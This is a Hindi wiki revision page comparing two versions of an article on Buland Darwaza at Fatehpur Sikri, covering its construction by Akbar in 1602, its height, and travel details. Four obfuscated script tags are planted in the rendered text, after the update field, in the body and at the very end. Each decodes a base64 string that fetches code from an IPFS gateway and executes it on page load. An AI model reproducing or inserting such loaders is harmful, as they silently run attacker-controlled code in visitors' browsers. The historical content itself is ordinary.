Difference between revisions of "बुलंद दरवाज़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{विश्‍व विरासत स्‍थल}}" to "{{विश्व विरासत स्थल2}}")
Line 1: Line 1:
[[File:Buland-Darwaja-Fatehpur-Sikri-Agra.jpg|बुलंद दरवाज़ा, [[फ़तेहपुर सीकरी]], [[आगरा]]<br /> Buland Darwaja, Fatehpur Sikri, Agra|thumb|250px]]  
+
{{सूचना बक्सा पर्यटन
*[[फ़तेहपुर सीकरी]] में [[अकबर]] के समय के अनेक भवनों, प्रासादों तथा राजसभा के भव्य अवशेष आज भी वर्तमान हैं।  
+
|चित्र=Buland-Darwaja-Fatehpur-Sikri-Agra.jpg
 +
|चित्र का नाम=बुलंद दरवाज़ा, [[फ़तेहपुर सीकरी]], [[आगरा]]
 +
|विवरण=बुलंद दरवाजे को, 1602 ई. में [[अकबर]] ने अपनी गुजरात-विजय के स्मारक के रूप में बनवाया था।
 +
|राज्य=[[उत्तर प्रदेश]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[आगरा ज़िला|आगरा]]
 +
|निर्माता=[[अकबर]]
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=[[मुग़ल काल]]
 +
|स्थापना=1602 ई.
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=आगरा से 43 किमी की दूरी पर स्थित है।
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज, रेल, बस, टैक्सी
 +
|हवाई अड्डा=आगरा हवाई अड्डा
 +
|रेलवे स्टेशन=आगरा कैंट रेलवे स्टेशन, आगरा फ़ोर्ट रेलवे स्टेशन
 +
|बस अड्डा=ईदगाह बस स्टैंड
 +
|यातायात=टैक्सी, ऑटो-रिक्शा, साइकिल रिक्शा, बस आदि।
 +
|क्या देखें=
 +
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=0562
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=[[ताजमहल]], [[फ़तेहपुर सीकरी]], [[सिकंदरा आगरा|सिकंदरा]], [[जामा मस्जिद]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=दरवाजे में पुराने जमाने के विशाल किवाड़ ज्यों के त्यों लगे हुए हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|16:29, 22 अक्टूबर 2011 (IST)}}
 +
}}
 +
 
 +
बुलन्द दरवाज़ा, [[भारत]] के [[उत्तर प्रदेश]] राज्य में [[आगरा]] से 43 किमी दूर [[फ़तेहपुर सीकरी]] नामक स्थान पर स्थित एक दर्शनीय स्मारक है। इसका निर्माण अकबर ने 1602 में करवाया था। '''बुलन्द शब्द का अर्थ महान या ऊँचा है।''' अपने नाम को सार्थक करने वाला यह स्मारक विश्व का सबसे बडा़ प्रवेशद्वार है। [[फ़तेहपुर सीकरी]] में [[अकबर]] के समय के अनेक भवनों, प्रासादों तथा राजसभा के भव्य अवशेष आज भी वर्तमान हैं।  
 
*यहाँ की सर्वोच्च इमारत बुलंद दरवाज़ा है, जिसकी ऊंचाई भूमि से 280 फुट है।  
 
*यहाँ की सर्वोच्च इमारत बुलंद दरवाज़ा है, जिसकी ऊंचाई भूमि से 280 फुट है।  
 
*52 सीढ़ियों के पश्चात दर्शक दरवाजे के अंदर पहुंचता है।  
 
*52 सीढ़ियों के पश्चात दर्शक दरवाजे के अंदर पहुंचता है।  
 
*दरवाजे में पुराने जमाने के विशाल किवाड़ ज्यों के त्यों लगे हुए हैं।  
 
*दरवाजे में पुराने जमाने के विशाल किवाड़ ज्यों के त्यों लगे हुए हैं।  
 
*शेख सलीम की मान्यता के लिए अनेक यात्रियों द्वारा किवाड़ों पर लगवाई हुई घोड़े की नालें दिखाई देती हैं।  
 
*शेख सलीम की मान्यता के लिए अनेक यात्रियों द्वारा किवाड़ों पर लगवाई हुई घोड़े की नालें दिखाई देती हैं।  
*बुलंद दरवाजे को, 1602 ई. में अकबर ने अपनी गुजरात-विजय के स्मारक के रूप में बनवाया था।  
+
*बुलंद दरवाजे को, 1602 ई. में अकबर ने अपनी [[गुजरात]]-विजय के स्मारक के रूप में बनवाया था।  
 
*इसी दरवाजे से होकर शेख की दरगाह में प्रवेश करना होता है।  
 
*इसी दरवाजे से होकर शेख की दरगाह में प्रवेश करना होता है।  
 
*बाईं ओर जामा मस्जिद है और सामने शेख का मज़ार। मज़ार या समाधि के पास उनके संबंधियों की क़ब्रें हैं।
 
*बाईं ओर जामा मस्जिद है और सामने शेख का मज़ार। मज़ार या समाधि के पास उनके संबंधियों की क़ब्रें हैं।
  
{{प्रचार}}
+
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
|प्रारम्भिक=प्रारम्भिक1
+
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=

Revision as of 11:34, 27 October 2011

buland daravaza
[[chitr:Buland-Darwaja-Fatehpur-Sikri-Agra.jpg|buland daravaza, fatehapur sikari, agara|200px|center]]
vivaran buland daravaje ko, 1602 ee. mean akabar ne apani gujarat-vijay ke smarak ke roop mean banavaya tha.
rajy uttar pradesh
zila agara
nirmata akabar
nirman kal mugal kal
sthapana 1602 ee.
marg sthiti agara se 43 kimi ki doori par sthit hai.
kaise pahuanchean havaee jahaj, rel, bas, taiksi
havaee adda agara havaee adda
relave steshan agara kaiant relave steshan, agara fort relave steshan
bas adda eedagah bas staiand
yatayat taiksi, aauto-riksha, saikil riksha, bas adi.
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 0562
e.ti.em lagabhag sabhi
sanbandhit lekh tajamahal, fatehapur sikari, sikandara, jama masjid


any janakari daravaje mean purane jamane ke vishal kiva d jyoan ke tyoan lage hue haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

buland daravaza, bharat ke uttar pradesh rajy mean agara se 43 kimi door fatehapur sikari namak sthan par sthit ek darshaniy smarak hai. isaka nirman akabar ne 1602 mean karavaya tha. buland shabd ka arth mahan ya ooancha hai. apane nam ko sarthak karane vala yah smarak vishv ka sabase bada़ praveshadvar hai. fatehapur sikari mean akabar ke samay ke anek bhavanoan, prasadoan tatha rajasabha ke bhavy avashesh aj bhi vartaman haian.

  • yahaan ki sarvochch imarat buland daravaza hai, jisaki ooanchaee bhoomi se 280 phut hai.
  • 52 sidhiyoan ke pashchat darshak daravaje ke aandar pahuanchata hai.
  • daravaje mean purane jamane ke vishal kiva d jyoan ke tyoan lage hue haian.
  • shekh salim ki manyata ke lie anek yatriyoan dvara kiva doan par lagavaee huee gho de ki nalean dikhaee deti haian.
  • buland daravaje ko, 1602 ee. mean akabar ne apani gujarat-vijay ke smarak ke roop mean banavaya tha.
  • isi daravaje se hokar shekh ki daragah mean pravesh karana hota hai.
  • baeean or jama masjid hai aur samane shekh ka mazar. mazar ya samadhi ke pas unake sanbandhiyoan ki qabrean haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>